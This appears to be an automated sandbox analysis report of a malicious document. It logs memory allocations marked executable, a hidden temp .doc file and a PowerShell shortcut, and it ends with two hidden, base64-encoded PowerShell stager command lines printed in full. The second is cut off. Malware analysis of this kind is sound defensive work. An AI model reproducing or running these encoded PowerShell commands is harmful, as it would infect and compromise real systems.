NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 1114112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x692d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x692d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02871000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0253a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02513000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02514000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0253c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02516000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0258c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02533000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02534000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02535000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02537000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02538000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02539000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2208 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04fd9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 9, 2021, 9:07 p.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004a4 filepath: C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$talhes_atualizacao.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
cmdline	powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGw